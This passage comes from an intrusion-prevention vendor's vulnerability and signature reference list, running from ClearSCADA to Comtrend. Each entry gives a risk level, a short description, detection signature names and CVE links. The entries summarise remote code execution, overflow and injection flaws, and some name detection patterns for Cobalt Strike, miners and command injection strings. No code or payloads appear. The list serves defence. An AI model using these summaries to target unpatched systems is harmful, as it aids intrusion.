Last changed: sgpkg-ips-1453-5242
Platform: Windows
Software: Schneider Electric ClearSCADA
Type: Malfunction
Description: A vulnerability in ClearSCADA DBServer where a remote attacker can send an SQL query, accessing the table by scheme, causing the DBServer to produce an exception. This creates a condition where the WebX on port 81 allows access to sensitive information without authroization.
Situation: File-TextId_ClearSCADA-DBServer-Denial-Of-Service
Back to top

Clearsearch

About this vulnerability: ClearSearch
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ClearSearch
Type: Misconfiguration
Description: ClearSearch is a Trojan adware. It is considered a potentially unwanted program.
Situation: HTTP_CSU-Clearsearch
HTTP_CSH-Clearsearch
Back to top

Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-50623

About this vulnerability: A vulnerability in Cleo VLTrader
Risk: Critical
First detected in: sgpkg-ips-1811-5242
Last changed: sgpkg-ips-1811-5242
Platform: Generic
Software: Cleo VLTrader
Type: Directory Traversal
Description: An arbitrary file read and write vulnerability in Cleo VLTrader, Harmony, and LexiCom allows unauthenticated remote code execution via a crafted HTTP request.
Situation: HTTP_CSH-Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-50623
References:
CVE-2024-50623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50623
Back to top

Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-55956

About this vulnerability: An attempt to exploit a vulnerability in Cleo VLTrader detected
Risk: High
First detected in: sgpkg-ips-1813-5242
Last changed: sgpkg-ips-1813-5242
Platform: Generic
Software: Cleo VLTrader
Type: Input Validation
Description: In Cleo Harmony before 5.8.0.24, VLTrader before 5.8.0.24, and LexiCom before 5.8.0.24, an unauthenticated user can import and execute arbitrary Bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory.
Situation: HTTP_CS-Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-55956
References:
CVE-2024-55956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55956
Back to top

Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite

About this vulnerability: Arbitary file download and overwrite vulnerability in Clever Internet ActiveX Suite
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Clever Internet ActiveX Suite
Type: Input Validation
Description: There is a vulnerability in Clever Internet ActiveX Suite. The vulnerability is due to a lack of input validation while processing user-supplied parameters for the ActiveX control. The vulnerability allows attacker to download and overwrite arbitrary files from the local system.
Situation: HTTP_SS-Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite
File-Text_Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite
References:
CVE-2007-4067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4067
BID-25063
http://www.securityfocus.com/bid/25063
Back to top

Click2findnow

About this vulnerability: Click2FindNow
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Click2FindNow
Type: Misconfiguration
Description: Click2FindNow is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Click2findnow
Back to top

ClickSpring-PuritySCAN-Application-Usage

About this vulnerability: ClickSpring.PuritySCAN Application Usage
Risk: Low
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ClickSpring.PuritySCAN
Type: Misconfiguration
Description: ClickSpring.PuritySCAN may be considered unwanted software by many organizations. ClickSpring.PuritySCAN is an adware application that delivers targeted advertising to the user's desktop and transmits the user's browsing history back to the vendor.
Situation: HTTP_CSH-ClickSpring-PuritySCAN-Application-Usage
Back to top

Clinics-Patient-Management-System-PHP-File-Upload

About this vulnerability: A vulnerability in Clinic's Patient Management System
Risk: Moderate
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Platform: Generic
Software: Clinic's Patient Management System
Type: Input Validation
Description: Insufficient sanitization of request contents causes a file upload vulnerability in Clinic's Patient Management System. A successful exploitation allows an attacker to upload and execute arbitrary files on the target system.
Situation: HTTP_CS-Clinics-Patient-Management-System-PHP-File-Upload
References:
CVE-2022-40471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40471
Back to top

Clipbucket-File-Upload-And-Command-Injection

About this vulnerability: A Clipbucket File Upload And Command Injection Vulnerability
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Clipbucket
Type: Input Validation
Description: A vulnerability in Clipbucket, versions before 4.0.0 (Release 4902), which allows remote attackers to upload malicious PHP files and inject OS and SQL commands, due to the insufficient input validation.
Situation: HTTP_CS- Clipbucket-File-Upload-And-Command-Injection
Back to top

Clorius-Controls-ICS-SCADA-Information-Disclosure

About this vulnerability: A vulnerability in Clorius Controls ICS SCADA
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Clorius Controls ICS SCADA
Type: Malfunction
Description: There is an information disclosure vulnerability in Clorius Controls ICS SCADA which allows an attacker to retrieve the firmware version, internal IP address and MAC adddress of the device without authentication.
Situation: HTTP_CSU-Clorius-Controls-ICS-SCADA-Information-Disclosure-Attempt
References:
BID-58800
http://www.securityfocus.com/bid/58800
Back to top

Cloudme-Sync-Stack-Based-Buffer-Overflow

About this vulnerability: A Cloudme Sync Stack-Based Buffer Overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CloudMe Sync
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability in CloudMe Sync, version 1.10.9, which allows remote attackers to control the program execution flow and execute arbitrary code via the client application listening on port 8888.
Situation: Generic_CS-Cloudme-Sync-Stack-Based-Buffer-Overflow
References:
CVE-2018-6892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6892
Back to top

Clowncryptor-Infection-Traffic

About this vulnerability: Clowncryptor infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Clowncryptor infection traffic was detected.
Situation: HTTP_CRL-Clowncryptor-Infection-Traffic
Back to top

Cmail-Email-Address-Processing-BOF

About this vulnerability: CMail Address Processing Buffer Overflow
Risk: High
First detected in: sgpkg-ips-333-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CMail mail server
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in the CMail mail server. Novell GroupWise. The vulnerability is due to an error while processing specially crafted SMTP requests. Remote attackers can exploit this vulnerability to execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute with the security privileges of the server. In an attack case where code injection is not successful, the affected process will terminate abnormally.
Situation: SMTP_Mail-From-Recipient-Name-BOF
References:
CVE-1999-1521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1521
BID-633
http://www.securityfocus.com/bid/633
Back to top

CMS-Made-Simple-Authenticated-RCE-Via-Object-Injection

About this vulnerability: A vulnerability in CMS Made Simple
Risk: High
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CMS Made Simple
Type: Input Validation
Description: There exists a vulnerability in CMS Made Simple, versions 2.2.6, 2.2.7, 2.2.8, 2.2.9, and 2.2.9.1, which allows remote attackers to execute remote code due to insufficient user input validation in the DesignManager module.
Situation: HTTP_CS-CMS-Made-Simple-Authenticated-RCE-Via-Object-Injection
References:
CVE-2019-9055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9055
Back to top

CMS-Made-Simple-Cache-Poisoning

About this vulnerability: A vulnerability in CMS Made Simple
Risk: High
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CMS Made Simple
Type: Input Validation
Description: There exists a cache poisoning vulnerability in CMS Made Simple versions prior to 2.1.3 and 1.12.2.
Situation: HTTP_CSH-CMS-Made-Simple-Cache-Poisoning
References:
CVE-2016-2784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2784
Back to top

CMS-Made-Simple-Login.php-Remote-Password-Reset-Vulnerability

About this vulnerability: A vulnerability in CMS Made Simple
Risk: Moderate
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CMS Made Simple
Type: Malfunction
Description: There has been reported a remote password reset vulnerability in CMS Made Simple. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request of password reset to the target system. Successful exploitation allows the attacker to change users' passwords.
Situation: HTTP_CRL-CMS-Made-Simple-Login.php-Remote-Password-Reset-Vulnerability
References:
CVE-2018-10081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10081
Back to top

CMS-Made-Simple-RCE

About this vulnerability: A vulnerability in CMS Made Simple
Risk: Moderate
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CMS Made Simple
Type: Misconfiguration
Description: A vulnerability in CMS Made Simple, versions 2.2.5 and 2.2.7, which allows remote attackers to execute arbitrary code by allowing the user to remotely upload a malicious file, rename the file with a .php extension, and execute.
Situation: HTTP_CS-CMS-Made-Simple-RCE
References:
CVE-2018-1000094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000094
Back to top

CMS-Made-Simple-Showtime2-File-Upload-RCE

About this vulnerability: A vulnerability in CMS Made Simple
Risk: High
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CMS Made Simple
Type: Insecure Configuration
Description: A vulnerability in CMS Made Simple, versions 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2, which allows remote attackers to upload malicious PHP files and execute remote code via the class class.showtime2_image.php.
Situation: HTTP_CS-CMS-Made-Simple-Showtime2-File-Upload-RCE
References:
CVE-2019-9692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9692
Back to top

CMS-Made-Simple-Smarty-Serverside-Template-Injection

About this vulnerability: A vulnerability in CMS Made Simple
Risk: Moderate
First detected in: sgpkg-ips-1333-5242
Last changed: sgpkg-ips-1333-5242
Platform: Generic
Software: CMS Made Simple
Type: Input Validation
Description: There exists a server side template injection vulnerability in CMS Made Simple. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-CMS-Made-Simple-Smarty-Serverside-Template-Injection
References:
CVE-2021-26120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26120
Back to top

CmsMadeSimple-Authenticated-File-Manager-RCE-CVE-2023-36969

About this vulnerability: A vulnerability in CMS Made Simple
Risk: Moderate
First detected in: sgpkg-ips-1862-5242
Last changed: sgpkg-ips-1862-5242
Platform: Generic
Software: CMS Made Simple
Type: Input Validation
Description: A vulnerability in CMS Made Simple, versions v2.2.21 and before, which allows remote attackers to upload files with the .phar or .phtml extensions, enabling execution of PHP code on the target system leading to RCE.
Situation: HTTP_CS-CmsMadeSimple-Authenticated-File-Manager-RCE-CVE-2023-36969
References:
CVE-2023-36969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36969
Back to top

Cobalt-Strike-Beacon-File

About this vulnerability: Cobalt Strike beacon was detected
Risk: High
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1761-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Cobalt Strike beacon was detected.
Situation: File-Text_Cobalt-Strike-Beacon-File
File-Binary_Possible-Cobalt-Strike-Beacon-Download
File-Exe_Cobalt-Strike-Beacon-File
Back to top

Cobalt-Strike-C2-HTTP-Traffic

About this vulnerability: Cobalt Strike C2 HTTP traffic was detected
Risk: High
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1423-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: An HTTP request that matches known Cobalt Strike command and control traffic patterns has been detected. This might indicate presence of a Cobalt Strike Beacon on the client system.
Situation: HTTP_CRL-Cobalt-Strike-C2-HTTP-Traffic
HTTP_CSH-Cobalt-Strike-C2-HTTP-Traffic
Back to top

Cobalt-Strike-Injector-File

About this vulnerability: Cobalt Strike injector file was detected
Risk: High
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1383-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Cobalt Strike injector file was detected.
Situation: File-Text_Cobalt-Strike-Injector-File
File-TextId_Cobalt-Strike-Injector-File
Back to top

Cobalt-Strike-Named-Pipe-Infection-Traffic

About this vulnerability: A named pipe used by Cobalt Strike detected
Risk: High
First detected in: sgpkg-ips-1384-5242
Last changed: sgpkg-ips-1384-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: A named pipe used by Cobalt Strike was detected.
Situation: SMB-TCP_Cobalt-Strike-Named-Pipe
Back to top

Cobalt-Strike-Self-Signed-TLS-Certificate

About this vulnerability: A Self-signed TLS certificate of Cobalt Strike was detected
Risk: High
First detected in: sgpkg-ips-1268-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: A Self-signed TLS certificate used by Cobalt Strike was detected. This might indicate that the system from where the traffic originated is compromised.
Situation: TLS_SS-Cobalt-Strike-Self-Signed-TLS-Certificate
Back to top

Cockpit-CMS-NoSQLi-To-RCE

About this vulnerability: A vulnerability in Cockpit CMS.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Generic
Software: Cockpit CMS
Type: Input Validation
Description: A vulnerability in Cockpit CMS, versions 0.10.0 - 0.11.1, which allows remote attackers to retrieve user lists and reset user passwords via NoSQL injections, CVE-2020-35846 and CVE-2020-35847, then allowing code injection via /accounts/find after authentication.
Situation: HTTP_CRL-Cockpit-CMS-NoSQLi-To-RCE
References:
CVE-2020-35846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35846
Back to top

CocoaPods-Trunk-Server-Remote-Code-Execution-CVE-2024-38366

About this vulnerability: An attempt to exploit a vulnerability in CocoaPods detected
Risk: High
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1748-5242
Platform: Generic
Software: CocoaPods
Type: Input Validation
Description: trunk.cocoapods.org is the authentication server for the CoacoaPods dependency manager. The part of trunk which verifies whether a user has a real email address on signup used a rfc-822 library which executes a shell command to validate the email domain MX records validity. It works via an DNS MX. This lookup could be manipulated to also execute a command on the trunk server, effectively giving root access to the server and the infrastructure. This RCE triggered a full user-session reset, as an attacker could have used this method to write to any Podspec in trunk.
Situation: File-Text_CocoaPods-Trunk-Server-Remote-Code-Execution-CVE-2024-38366
References:
CVE-2024-38366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38366
Back to top

CoCSoft-Stream-Down-Buffer-Overflow

About this vulnerability: A CoCSoft Stream Down Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CoCSoft Stream Down
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in CoCSoft Stream Down 6.8.0 which allows remote attackers to execute arbitrary code via a long response to a download request.
Situation: Generic_SS-CoCSoft-Stream-Down-Buffer-Overflow
References:
CVE-2011-5052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5052
BID-51190
http://www.securityfocus.com/bid/51190
OSVDB-78043
http://www.osvdb.org/78043
Back to top

CodeIgniter-Common.php-Insecure-Deserialization

About this vulnerability: A vulnerability in CodeIgniter PHP framework.
Risk: High
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1435-5242
Platform: Generic
Software: CodeIgniter
Type: Input Validation
Description: A vulnerability in CodeIgniter PHP framework, before 4.1.6, which allows remote attackers to execute arbitrary code on a target system by sending crafted traffic, due to insufficient validation of serialized data sent to the old function in Common.php.
Situation: HTTP_CS-CodeIgniter-Common.php-Insecure-Deserialization
References:
CVE-2022-21647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21647
Back to top

Codesys-Gateway-Server-DoS-Vulnerability

About this vulnerability: A vulnerability in CoDeSys Gateway Server
Risk: Moderate
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Malfunction
Description: There is a denial of service vulnerability in CoDeSys Gateway Server
Situation: Generic_CS-Codesys-Gateway-Server-DoS-Vulnerability
Back to top

Codesys-Gateway-Server-Opcode-0x3ef-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Smart Software Solutions CoDeSys
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Buffer Overflow
Description: 3S Smart Software CoDeSys has an input validation vulnerability which can be exploited to cause a denial of service condition by terminating the service.
Situation: Generic_CS-Codesys-Gateway-Server-Opcode-0x3ef-Heap-Buffer-Overflow
References:
CVE-2015-6460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6460
Back to top

Codesys-V3-Cmprouter-And-Cmprouterembedded-Integer-Overflow

About this vulnerability: A vulnerability in Smart Software Solutions CoDeSys Control for BeagleBone
Risk: Moderate
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Integer Overflow
Description: Improper validation of protocol messages causes an integer overflow vulnerability in Smart Software Solutions CodeSys. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Codesys-V3-Cmprouter-And-Cmprouterembedded-Integer-Overflow
References:
CVE-2019-5105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5105
Back to top

Codesys-V3-Cmpwebserver-And-Cmpwebserverhandler-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Smart Software Solutions CoDeSys Control for BeagleBone
Risk: Moderate
First detected in: sgpkg-ips-1212-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Buffer Overflow
Description: Improper validation of inputs to the /WebVisuV3 path causes a heap buffer overflow vulnerability in Smart Software Solutions CoDeSys Control. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the server process.
Situation: HTTP_CS_Codesys-V3-Cmpwebserver-And-Cmpwebserverhandler-Heap-Buffer-Overflow
References:
CVE-2019-18858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18858
Back to top

Codesys-V3-Cmpwebserverhandler-Memgcgetsize-Integer-Overflow

About this vulnerability: A vulnerability in Smart Software Solutions CoDeSys Control for BeagleBone
Risk: Moderate
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Integer Overflow
Description: Improper validation of user-sent data causes an integer overflow vulnerability in CoDeSys V3 run-time system's web server. A successful exploit may allow an attacker to run arbitrary code with the privileges of the target process.
Situation: HTTP_CSH-Codesys-V3-Cmpwebserverhandler-Memgcgetsize-Integer-Overflow
References:
CVE-2020-10245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10245
Back to top

Cogent-DataHub-DirTrav

About this vulnerability: Cogent DataHub Directory Traversal Vulnerability 0-day
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cogent DataHub
Type: Directory Traversal
Description: A directory traversal vulnerability in Cogent DataHub allowing remote attackers to discover and download the files on disk where it is installed.
Situation: HTTP_CSU-Cogent-DataHub-DirTrav
Back to top

Cogent-Datahub-Remote-Unicode-Buffer-Overflow

About this vulnerability: A vulnerability Cogent Datahub
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cogent DataHub
Type: Buffer Overflow
Description: There are multiple stack-based buffer overflows in Cogent DataHub which allows remote attacker to cause a denial of service via crafted commands.
Situation: Generic_CS-Cogent-Datahub-Remote-Unicode-Buffer-Overflow
References:
CVE-2011-3493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3493
Back to top

Cogent-Datahub-Web-Server-Getpermissions.asp-Command-Injection

About this vulnerability: A vulnerability in Cogent DataHub
Risk: Moderate
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cogent DataHub
Type: Input Validation
Description: A remote command injection vulnerability has been reported in Cogent DataHub. The vulnerability is due to insufficient validation within the GetPermissions.asp page. A remote attacker can exploit this vulnerability by submitting a maliciously crafted request to GetPermissions.asp. This can result in arbitrary command execution on the vulnerable system.
Situation: HTTP_CRL-Cogent-Datahub-Web-Server-Getpermissions.asp-Command-Injection
References:
CVE-2014-3789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3789
BID-67486
http://www.securityfocus.com/bid/67486
OSVDB-107097
http://www.osvdb.org/107097
Back to top

Coinhive-Monero-JavaScript-Miner

About this vulnerability: Coinhive Monero JavaScript Miner
Risk: High
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Monero
Type: Javascript Injection
Description: A page was accessed that contains Coinhive Monero Javascript Miner. Coinhive Monero Javascript Miner is a digital currency miner, which uses processor power of the visitor's computer without permission to mine digital currency called "Monero". This activity happens in background and it isn't visible to the visitor. Original Coinhive Monero Javascript Miner doesn't infect the visitor's computer with malware.
Situation: File-Text_Coinhive-Monero-JavaScript-Miner
File-Text_Coinhive-Miner
Back to top

Coinminer-Trojan-Traffic

About this vulnerability: An XMRig cryptocoin miner
Risk: High
First detected in: sgpkg-ips-1345-5242
Last changed: sgpkg-ips-1528-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Traffic patterns corresponding to a possible XMRig cryptocoin miner.
Situation: File-Text_Coinminer-Trojan-Traffic
Generic_CS-Coinminer-Trojan-Traffic
Back to top

Colloquy-IRC-Channel-Invite-Format-String-DoS

About this vulnerability: Colloquy IRC Channel Invite Format String DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Colloquy
Type: Input Validation
Description: A vulnerability exists in Colloquy 2.1 and before which allows remote attackers to cause a denial of service condition, and possibly execute arbitrary code by using format string specifiers in the Channel name of an INVITE request.
Situation: Generic_SS-Colloquy-IRC-Channel-Invite-Format-String-DoS
References:
CVE-2007-0344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0344
BID-22086
http://www.securityfocus.com/bid/22086
OSVDB-32688
http://www.osvdb.org/32688
Back to top

Command-Interpreter-In-Cgi

About this vulnerability: Command interpreter in CGI directory
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: Insecure Configuration
Description: A generic command interpreter such as zsh, csh, bash, sh, or perl is in the cgi directory of the Web server. In the worst case, the interpreter can be used to obtain full system control as it can execute arbitrary commands.
Situation: HTTP_CSU-Command-Interpreter-In-Cgi
References:
CVE-1999-0509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0509
Back to top

Common-Command-Injection-String

About this vulnerability: A common command injection string in URI
Risk: High
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: <os>
Type: Script Injection
Description: A suspicious string in URI parameters may indicate a script injection attempt.
Situation: HTTP_CSU-Common-Command-Injection-String
HTTP_CSU-Common-Command-Injection-String-2
HTTP_CSU-Common-Command-Injection-String-3
Back to top

CommuniGate-Pro-LDAP-Server-Bind-Request-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the processing of bind request in CommuniGate Pro
Risk: High
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CommuniGate Pro
Type: Buffer Overflow
Description: The CommuniGate Pro product has a vulnerability in the LDAP (Lightweight Directory Access Protocol) service. The service fails to correctly process the length information of the user credentials field in bind request message. Certain length values will cause integer overflow in the service. This vulnerability can be used to cause denial of service and possibly to make injected code execution attacks against the vulnerable service.
Situation: LDAP_CommuniGate-Pro-LDAP-Server-Bind-Request-Buffer-Overflow
References:
CVE-2006-0468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0468
BID-16407
http://www.securityfocus.com/bid/16407
Back to top

Commvault-Commcell-Cvsearchservice-Downloadfile-Authentication-Bypass

About this vulnerability: A vulnerability in Commvault CommCell
Risk: Moderate
First detected in: sgpkg-ips-1418-5242
Last changed: sgpkg-ips-1418-5242
Platform: Generic
Software: Commvault CommCell
Type: Malfunction
Description: The use of hardcoded credentials to access CVSearchService endpoint causes an authentication bypass vulnerability in Commvault CommCell. A successful exploit allows an attacker to execute arbitrary code on the target with system privileges.
Situation: HTTP_CS-Commvault-Commcell-Cvsearchservice-Downloadfile-Authentication-Bypass
References:
CVE-2021-34996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34996
Back to top

Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Commvault CommCell
Risk: Moderate
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Platform: Generic
Software: Commvault CommCell
Type: Input Validation
Description: Improper validation of the uploaded file path in DownloadCenterUploadHandler class causes an arbitrary file upload vulnerability in Commvault CommCell. A successful exploit allows an attacker to upload arbitrary files on the target system to be executed with system privileges.
Situation: HTTP_CRL-Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload
File-TextId_Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload
References:
CVE-2021-34995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34995
Back to top

Computer-Associates-ARCserve-Backup-Discovery-Service-Denial-Of-Service

About this vulnerability: A vulnerability in Computer Associates ARCserve Backup
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup; Computer Associates Business Protection Suite; Computer Associates Server Protection Suite
Type: Malfunction
Description: There is a denial of service vulnerability in Computer Associates ARCserve Backup Discovery service. The vulnerability is due to insufficient input validation by casdscsvc.exe. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted message to the target server that may lead to a denial of service condition.
Situation: Generic_CS-Computer-Associates-ARCserve-Backup-Discovery-Service-DoS
References:
CVE-2008-1979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1979
BID-28927
http://www.securityfocus.com/bid/28927
Back to top

Computer-Associates-BrightStor-Arcserve-Backup-MediaSRV.exe-Buffer-Overflow

About this vulnerability: Computer Associates BrightStor Arcserve Backup MediaSRV.exe Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup
Type: Buffer Overflow
Description: A vulnerability exists in Computer Associates BrightStor ARCserve Backup 11.5 SP2 build 4237 which allows remote attackers to execute arbitrary code via crafted xdr_handle_t RPC packets.
Situation: Generic_UDP-Computer-Associates-BrightStor-Arcserve-Backup-MediaSRV.exe-Buffer-Overflow
References:
CVE-2007-1785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1785
BID-23209
http://www.securityfocus.com/bid/23209
Back to top

Computer-Associates-iGateway-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Computer Associates iGateway 3.0 and 4.0 before 4.0.050623
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates iTechnology iGateway
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Computer Associates iGateway, 3.0 and 4.0 before 4.0.050623, when running in debug mode, which allows remote attackers to execute arbitrary code via HTTP GET requests.
Situation: Generic_CS-Computer-Associates-iGateway-Buffer-Overflow
References:
CVE-2005-3190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3190
BID-15025
http://www.securityfocus.com/bid/15025
OSVDB-19920
http://www.osvdb.org/19920
Back to top

Computer-Associates-iGateway-Content-Length-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of HTTP Content-Length field in the Computer Associates iGateway service
Risk: Critical
First detected in: sgpkg-ips-56-1210
Last changed: sgpkg-ips-1584-5242
Platform: Windows
Software: Computer Associates iTechnology iGateway
Type: Buffer Overflow
Description: The Computer Associates iTechnology iGateway service fails to validate the value of the Content-Length field in an HTTP request. If the value of this field is negative or too large, a heap-based buffer overflow will occur. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the vulnerable system.
Situation: HTTP_CSH-Invalid-Negative-Content-Length-Value
References:
CVE-2005-3653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3653
BID-16354
http://www.securityfocus.com/bid/16354
OSVDB-22688
http://www.osvdb.org/22688
Back to top

Comtrend-CT-5624-Router-Remote-Password-Disclosure

About this vulnerability: A vulnerability in Comtrend CT-5624 router
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Comtrend CT-5624 Router
Type: Malfunction
Description: There is an information disclosure vulnerability in Comtrend CT-5624 routers which allows an attacker to retrieve sensitive information without authentication.
Situation: HTTP_CSU-Comtrend-CT-5624-Router-Remote-Password-Disclosure
References:
BID-50601
http://www.securityfocus.com/bid/50601
Back to top

Conflicting-Content-Type-Header

